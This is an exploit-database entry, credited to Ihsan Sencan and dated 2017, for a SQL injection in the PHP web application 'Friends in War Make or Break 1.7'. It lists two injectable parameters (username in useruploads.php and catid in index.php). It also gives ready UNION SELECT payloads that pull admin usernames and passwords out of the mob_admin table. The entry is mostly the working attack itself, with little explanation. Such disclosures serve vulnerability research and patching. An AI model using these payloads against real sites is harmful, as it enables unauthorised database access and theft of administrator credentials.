Friends in War Make or Break 1.7 - SQL Injection

EDB-ID: 42381
Author: Ihsan Sencan
Published: 2017-07-26
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: Download Vulnerable Application

 # Exploit Title: Friends in War Make or Break 1.7 SQL Injection 
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #

Related Posts

Comments